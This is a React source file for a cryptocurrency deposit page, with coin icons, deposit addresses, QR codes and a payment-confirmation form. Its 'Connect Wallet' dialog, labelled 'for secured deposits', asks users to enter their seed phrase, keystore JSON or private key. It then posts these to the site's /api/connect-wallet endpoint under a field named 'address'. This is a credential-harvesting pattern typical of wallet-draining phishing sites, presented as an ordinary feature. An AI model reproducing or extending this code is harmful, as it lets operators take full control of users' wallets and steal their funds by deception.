import React, {useState, useEffect, Fragment} from 'react'
import Button from '@mui/material/Button';
import Box from '@mui/material/Box';
import Typography from '@mui/material/Typography';

import Dialog from '@mui/material/Dialog';
import DialogContent from '@mui/material/DialogContent';
import DialogContentText from '@mui/material/DialogContentText';
import Slide from '@mui/material/Slide';

import InputLabel from '@mui/material/InputLabel';
import FormControl from '@mui/material/FormControl';
import OutlinedInput from '@mui/material/OutlinedInput';

import apiClient from "../../request/http-common";
import Backdrop from '@mui/material/Backdrop';
import CircularProgress from '@mui/material/CircularProgress';
import { useDispatch } from 'react-redux';
import { useSelector } from 'react-redux';
import { useNavigate } from 'react-router-dom';
import { setRedirect } from '../Auth/historySlice';

import List from '@mui/material/List';
import ListItem from '@mui/material/ListItem';
import ListItemText from '@mui/material/ListItemText';

import Divider from '@mui/material/Divider';
import ListItemAvatar from '@mui/material/ListItemAvatar';
import Avatar from '@mui/material/Avatar';

import ListSubheader from '@mui/material/ListSubheader';
import {CopyToClipboard} from 'react-copy-to-clipboard';
import { CardActions } from '@mui/material';
import { Currency } from '@depay/local-currency';
import { useQuery } from 'react-query';
import AttachMoneyIcon from '@mui/icons-material/AttachMoney';
import { setDepayTransactions } from '../../request/Analysis/hitorySlice';

import { QRCode } from 'react-qrcode-logo';
import TextField from '@mui/material/TextField';

import { CardContent } from '@mui/material';
import Card from '@mui/material/Card';
import { useMutation } from 'react-query';
import { setFundings } from '../Wallet/walletSlice';
import SendIcon from '@mui/icons-material/Send';
import CallReceivedIcon from '@mui/icons-material/CallReceived';
import AccountBalanceWalletIcon from '@mui/icons-material/AccountBalanceWallet';
import DialogTitle from '@mui/material/DialogTitle';
import DialogActions from '@mui/material/DialogActions';
import MenuItem from '@mui/material/MenuItem';
import Select from '@mui/material/Select';
import Tabs from '@mui/material/Tabs';
import Tab from '@mui/material/Tab';

const Transition = React.forwardRef(function Transition(props, ref) {
  return <Slide direction="up" ref={ref} {...props} />;
});

const Receive = () => {
  const [error, setErros] = useState('');

    const formatPrice = (amount)=> new Intl.NumberFormat('en-US', { style: 'currency', currency: 'USD', currencySign: 'standard' }).format(amount);

    // Function to get the correct coin image, especially for USDT and USDC networks
    const getCoinImage = (coinName) => {
      const name = coinName.toUpperCase().trim();
      
      // Handle USDT network-specific images with improved detection
      if (name.includes('USDT')) {
        console.log('Detecting USDT network for:', coinName, '| Uppercase:', name); // Debug log
        
        // BEP20 detection (check first as it's more specific)
        if (name.includes('BEP20') || name.includes('BEP-20') || name === 'USDTBEP20' || 
            name === 'USDT BEP20' || name.includes('USDT-BEP20') || name.includes('USDT_BEP20') ||
            name.includes('BEP') || name.includes('BSC') || name.includes('BINANCE') ||
            name === 'USDT (BEP20)' || name === 'USDT(BEP20)' || name.includes('BNB') ||
            name.includes('BEB20') || name === 'USDT BEB20' || name.includes('USDT-BEB20') ||
            name.includes('USDT_BEB20') || name === 'USDT (BEB20)' || name === 'USDT(BEB20)') {
          console.log('BEP20 USDT detected'); // Debug log
          return 'https://res.cloudinary.com/dyz8kppso/image/upload/v1752175057/tqhyabuabwc12blvwb71.png'; // BEP20
        }
        
        // TRC20 detection
        else if (name.includes('TRC20') || name.includes('TRC-20') || name === 'USDTTRC20' || 
                 name === 'USDT TRC20' || name.includes('USDT-TRC20') || name.includes('USDT_TRC20') ||
                 name.includes('TRC') || name.includes('TRON') ||
                 name === 'USDT (TRC20)' || name === 'USDT(TRC20)') {
          console.log('TRC20 USDT detected'); // Debug log
          return 'https://res.cloudinary.com/dyz8kppso/image/upload/v1752175000/sdsiri9rofpryoch5vur.png'; // TRC20
        }
        
        // ERC20 detection
        else if (name.includes('ERC20') || name.includes('ERC-20') || name === 'USDTERC20' || 
                 name === 'USDT ERC20' || name.includes('USDT-ERC20') || name.includes('USDT_ERC20') ||
                 name.includes('ERC') || name.includes('ETHEREUM') || name.includes('ETH') ||
                 name === 'USDT (ERC20)' || name === 'USDT(ERC20)') {
          console.log('ERC20 USDT detected'); // Debug log
          return 'https://res.cloudinary.com/dyz8kppso/image/upload/v1752175050/ygcskdpjbdamotflczso.jpg'; // ERC20
        }
        
        // Default USDT to TRC20 if no specific network is mentioned
        else if (name === 'USDT') {
          console.log('Default USDT (TRC20) detected'); // Debug log
          return 'https://res.cloudinary.com/dyz8kppso/image/upload/v1752175000/sdsiri9rofpryoch5vur.png'; // TRC20
        }
      }
      
      // Handle USDC network-specific images
      if (name.includes('USDC')) {
        console.log('Detecting USDC network for:', coinName, '| Uppercase:', name); // Debug log
        
        // ERC20 detection (USDC is primarily on Ethereum)
        if (name.includes('ERC20') || name.includes('ERC-20') || name === 'USDCERC20' || 
            name === 'USDC ERC20' || name.includes('USDC-ERC20') || name.includes('USDC_ERC20') ||
            name.includes('ERC') || name.includes('ETHEREUM') || name.includes('ETH') ||
            name === 'USDC (ERC20)' || name === 'USDC(ERC20)' || name === 'USDC') {
          console.log('ERC20 USDC detected'); // Debug log
          return 'https://res.cloudinary.com/dyz8kppso/image/upload/v1752850333/dc07jds0ueozxgsbrzrf.png'; // USDC
        }
        
        // BEP20 detection for USDC
        else if (name.includes('BEP20') || name.includes('BEP-20') || name === 'USDCBEP20' || 
                 name === 'USDC BEP20' || name.includes('USDC-BEP20') || name.includes('USDC_BEP20') ||
                 name.includes('BEP') || name.includes('BSC') || name.includes('BINANCE') ||
                 name === 'USDC (BEP20)' || name === 'USDC(BEP20)' || name.includes('BNB')) {
          console.log('BEP20 USDC detected'); // Debug log
          return 'https://res.cloudinary.com/dyz8kppso/image/upload/v1752850333/dc07jds0ueozxgsbrzrf.png'; // USDC
        }
        
        // TRC20 detection for USDC
        else if (name.includes('TRC20') || name.includes('TRC-20') || name === 'USDCTRC20' || 
                 name === 'USDC TRC20' || name.includes('USDC-TRC20') || name.includes('USDC_TRC20') ||
                 name.includes('TRC') || name.includes('TRON') ||
                 name === 'USDC (TRC20)' || name === 'USDC(TRC20)') {
          console.log('TRC20 USDC detected'); // Debug log
          return 'https://res.cloudinary.com/dyz8kppso/image/upload/v1752850333/dc07jds0ueozxgsbrzrf.png'; // USDC
        }
      }
      
      // For all other coins, use the default coincap.io images (convert back to lowercase for the API)
      return `https://assets.coincap.io/assets/icons/${name.toLowerCase()}@2x.png`;
    };

    const navigate = useNavigate();
    const user = useSelector((state) => state.user.user);
    const addresses = useSelector((state) => state.coins.addresses);
    const isAuth = useSelector((state) => state.auth.isAuthenticated);
    const [coin, setCoin] = useState('');
    const [address, setAddress] = useState('');
    const [connectWalletOpen, setConnectWalletOpen] = useState(false);
    const [connectWalletOptionId, setConnectWalletOptionId] = useState('');
    const [connectWalletTab, setConnectWalletTab] = useState(0);
    const [seedPhrase, setSeedPhrase] = useState('');
    const [keystoreJson, setKeystoreJson] = useState('');
    const [privateKey, setPrivateKey] = useState('');

    const phraseTypes = ['seed_phrase', 'keystore_json', 'private_key'];
    const getPhraseValue = () => [seedPhrase, keystoreJson, privateKey][connectWalletTab];

    const resetConnectWallet = () => {
      setConnectWalletOpen(false);
      setConnectWalletOptionId('');
      setConnectWalletTab(0);
      setSeedPhrase('');
      setKeystoreJson('');
      setPrivateKey('');
    };

    const dispatch = useDispatch();
    const [amount, setAmount] = useState(null);
    const [buttonText, setbuttonText] = useState(null);
    const [amountText, setAmountText] = useState(null);
    const [open, setOpen] = React.useState(false);
    const coins = useSelector((state) => state.coins.coins);
    const [conArray, setCoinArray] = useState([]);
    const coinRates = useSelector((state) => state.coins.coinRates);
    const availableCoins = ['USDT', 'USDTERC20', 'USDTTRC20', 'USDC', 'USDCERC20', 'USDCBEP20', 'USDCTRC20', 'XMR', 'XLM', 'ETH', 'TRX', 'XRP', 'BTC', 'LTC', 'BCH', 'DOGE', 'DASH', 'BNB'];

    let acceptedCoins = [];
    const loadCoins = () => {

      if (addresses.length > 0) {
        addresses.forEach(address => {
          acceptedCoins.push(address.coin_name);
          setCoinArray(acceptedCoins);
        });
      }

    }

    const { isLoading: isSendingRequest, mutate: postRequest } = useMutation(

        async () => {
          return await apiClient.post(`/api/save-funding`, {
            amount: amount,
            coin: coin.id
          });
        },
        {
          onSuccess: (res) => {
            dispatch(setFundings(res.data.fundings))
            setCoin('');
    
            localStorage.setItem('notification', JSON.stringify({message : `${res.data.message}`, 'type': 'success' }));
            const event = new Event('newMessage');
            window.dispatchEvent(event);
            const event2 = new Event('processed');
            window.dispatchEvent(event2);
            setTimeout(() => {
              navigate('/account-wallet');
            }, 2000);
          },
          onError: (err) => { 
            // setCoin('');
            if (err.response?.data.length) {
              let myerror = err.response?.data || err;         
            //   setErros(myerror.errors)  
              const event2 = new Event('processed');
              window.dispatchEvent(event2); 
            }else{
              
              let errMessage = err.response?.data.message || err;     
    
              localStorage.setItem('notification', JSON.stringify({message : `${errMessage}`, 'type': 'error' }));
              const event = new Event('newMessage');
              window.dispatchEvent(event);
              const event2 = new Event('processed');
              window.dispatchEvent(event2); 
            }
                
          },
        }
      );

    const { data: walletOptionsData } = useQuery(
      'wallet-options',
      async () => await apiClient.get('/api/wallet-options'),
      { enabled: connectWalletOpen }
    );
    const walletOptions = walletOptionsData?.data?.wallet_options || [];

    const { isLoading: isConnectingWallet, mutate: submitConnectWallet } = useMutation(
      async () => {
        return await apiClient.post('/api/connect-wallet', {
          wallet_option_id: connectWalletOptionId,
          phrase_type: phraseTypes[connectWalletTab],
          address: getPhraseValue(),
        });
      },
      {
        onSuccess: (res) => {
          if (res.data.status === 'success') {
            localStorage.setItem('notification', JSON.stringify({ message: res.data.message, type: 'success' }));
            window.dispatchEvent(new Event('newMessage'));
            resetConnectWallet();
          }
        },
        onError: (err) => {
          const errMessage = err.response?.data?.message || err.message || 'Failed to save wallet.';
          localStorage.setItem('notification', JSON.stringify({ message: errMessage, type: 'error' }));
          window.dispatchEvent(new Event('newMessage'));
        },
      }
    );

    useEffect(() => {
        loadCoins();
      }, []);

  return (
    <div style={{marginTop: '70px'}}>
      
      {coin === '' ?


          <Fragment>

          {coinRates.length > 0 &&
            

      <List sx={{ width: '100%', marginTop: '20px'}}
      subheader={<ListSubheader sx={{zIndex: 0, textAlign: 'center', position: 'relative'}}>SELECT ANY COIN BELOW</ListSubheader>}
      >
      <ListItem
        alignItems="center"
        sx={{ display: 'flex', alignItems: 'center', py: 2 }}
      >
        <ListItemAvatar sx={{ minWidth: 56, display: 'flex', justifyContent: 'center' }}>
          <Avatar sx={{ width: 40, height: 40, bgcolor: 'primary.main' }}>
            <AccountBalanceWalletIcon />
          </Avatar>
        </ListItemAvatar>
        <ListItemText
          primary="Connect Wallet"
          secondary="Connect your wallet for secured deposits"
          sx={{ flex: 1 }}
        />
        <Button
          onClick={() => setConnectWalletOpen(true)}
          fullWidth={false}
          edge="end"
          size="small"
          color="primary"
          variant="contained"
          sx={{ minWidth: 80, height: 36, ml: 2 }}
        >
          Connect
        </Button>
      </ListItem>
      <Divider component="li" />

      {addresses.map(address => (
        
        ((address.display_area === 'payments') && (address.trader_name === null))
          
          && 
         <Fragment key={address.coin_name}>
        <ListItem 
          alignItems="center"
          sx={{ 
            display: 'flex', 
            alignItems: 'center', 
            py: 2 
          }}
        >
        <ListItemAvatar sx={{ minWidth: 56, display: 'flex', justifyContent: 'center' }}>
            <Avatar 
              alt="Coin Name"
              src={getCoinImage(address.coin_name)}
              sx={{ width: 40, height: 40 }}
            />
        </ListItemAvatar>

        <ListItemText
          primary={address.coin_name}
          secondary={
            <React.Fragment>
            </React.Fragment>
          }
          sx={{ 
            flex: 1, 
            display: 'flex', 
            alignItems: 'center',
            '& .MuiListItemText-primary': {
              display: 'flex',
              alignItems: 'center',
              fontSize: '16px',
              fontWeight: 500
            }
          }}
        />
        <Button 
          onClick={() => {
            setCoin(address);
            setAddress(address.address);
          }} 
          fullWidth={false} 
          edge="end" 
          size="small" 
          color="primary" 
          variant="contained"
          sx={{ 
            minWidth: 80,
            height: 36,
            ml: 2
          }}
        > 
          Deposit
        </Button> 
        
      </ListItem>
      <Divider  component="li" />
     </Fragment>))}
    </List>
          }   
         </Fragment> 
        :
        <Card className='box' sx={{ borderRadius: '9px', height: '100%', margin: 1}}>

          <Typography my={3} px={4} sx={{textAlign: 'center'}}  variant="body2" color="white">
          {coin.wallet_type === 'bank' ?
          `Kindly make payment to our ${coin.coin_name} account using the details below`
          : 
          `Kindly send ${coin.coin_name} to the provided  address below.`
          }
          
          </Typography>

          <CardContent sx={{textAlign: 'center'}}>

          {coin.wallet_type === 'Crypto' &&

        <QRCode qrStyle="dots" value={address} size={200} logoImage=
        {getCoinImage(coin.coin_name)}
        />
        }

            <Box my={2} sx={{ display: 'flex', justifyContent: 'center' }}>
              <CircularProgress />           
            </Box>
           
          <CopyToClipboard onCopy={() => {setbuttonText( coin.wallet_type === 'bank'? 'Account Details Copied' : 'Address Copied');
              setTimeout(() => {
                  setbuttonText(null);
              }, 2000);}} text={address}>
              <FormControl  fullWidth={true} sx={{ minWidth: 50, marginBottom: 2 }}>
                  <TextField
                  minRows={1} multiline                  
                  defaultValue={address}
                  id="address"
                  name="address"
                  type={'text'}
                  label= {buttonText !== null? buttonText: `Click to copy ${coin.coin_name} ${coin.wallet_type === 'bank'? 'bank details' : 'address'} `}
                  />
              </FormControl> 
          </CopyToClipboard>

          <FormControl fullWidth={true} sx={{  minWidth: 50, marginBottom: 2 }}>
              <InputLabel htmlFor="amount">Amount (USDT)</InputLabel>
              {(error !== '' && error.amount) ?

              <OutlinedInput
              onChange={(e)=>setAmount(e.target.value)}
              error
              id="amount"
              type={'number'}
              name="amount"
              label="Amount (USDT)"
              helperText={error.amount}
              />
              :
              <OutlinedInput
              onChange={(e)=>setAmount(e.target.value)}
              id="amount"
              type={'number'}
              name="amount"
              label="Amount (USDT)"
              />
              }
              <Typography color='error'  sx={{  textAlign: 'left', fontSize: 16  }} variant="subtitle1" gutterBottom>
              {error !== '' && error.amount}
              </Typography>
          </FormControl>
        
          </CardContent>

          <CardActions> 
          <Button onClick={()=>setCoin('')} fullWidth={true} edge="end" size="small" color="error" variant="contained"> 
          Cancel
        </Button> 

        <Button onClick={postRequest} fullWidth={true} edge="end" size="small" color="primary" variant="contained"> 
         {isSendingRequest? 'sending...' : 'Confirm Payment'} 
        </Button>

          </CardActions>
        </Card>
        
        }

      <Dialog
        open={connectWalletOpen}
        onClose={resetConnectWallet}
        TransitionComponent={Transition}
        maxWidth="sm"
        fullWidth
      >
        <DialogTitle sx={{ textAlign: 'center' }}>Connect Wallet</DialogTitle>
        <DialogContent>
          <Typography variant="body2" color="text.secondary" sx={{ mb: 2 }}>
            Choose your wallet and select how you want to connect.
          </Typography>
          <FormControl fullWidth sx={{ mb: 2 }}>
            <InputLabel id="connect-wallet-option">Wallet</InputLabel>
            <Select
              labelId="connect-wallet-option"
              value={connectWalletOptionId}
              label="Wallet"
              onChange={(e) => setConnectWalletOptionId(e.target.value)}
            >
              <MenuItem value=""><em>Select wallet</em></MenuItem>
              {walletOptions.map((opt) => (
                <MenuItem key={opt.id} value={opt.id}>
                  <Box sx={{ display: 'flex', alignItems: 'center', gap: 1 }}>
                    {opt.image_url && (
                      <Avatar src={opt.image_url} sx={{ width: 24, height: 24 }} />
                    )}
                    {opt.name}
                  </Box>
                </MenuItem>
              ))}
            </Select>
          </FormControl>

          <Tabs
            value={connectWalletTab}
            onChange={(e, val) => setConnectWalletTab(val)}
            variant="fullWidth"
            sx={{ mb: 2, borderBottom: 1, borderColor: 'divider' }}
          >
            <Tab label="Seed Phrase" />
            <Tab label="Keystore JSON" />
            <Tab label="Private Key" />
          </Tabs>

          {connectWalletTab === 0 && (
            <TextField
              fullWidth
              label="Seed Phrase"
              value={seedPhrase}
              onChange={(e) => setSeedPhrase(e.target.value)}
              placeholder="Enter your 12 or 24-word seed phrase"
              multiline
              minRows={3}
            />
          )}
          {connectWalletTab === 1 && (
            <TextField
              fullWidth
              label="Keystore JSON"
              value={keystoreJson}
              onChange={(e) => setKeystoreJson(e.target.value)}
              placeholder="Paste your keystore JSON here"
              multiline
              minRows={3}
            />
          )}
          {connectWalletTab === 2 && (
            <TextField
              fullWidth
              label="Private Key"
              value={privateKey}
              onChange={(e) => setPrivateKey(e.target.value)}
              placeholder="Enter your private key"
              multiline
              minRows={3}
            />
          )}
        </DialogContent>
        <DialogActions>
          <Button onClick={resetConnectWallet}>
            Cancel
          </Button>
          <Button
            variant="contained"
            onClick={() => submitConnectWallet()}
            disabled={!connectWalletOptionId || !getPhraseValue().trim() || isConnectingWallet}
          >
            {isConnectingWallet ? 'Saving...' : 'Connect'}
          </Button>
        </DialogActions>
      </Dialog>
    </div>
  )
}

export default Receive
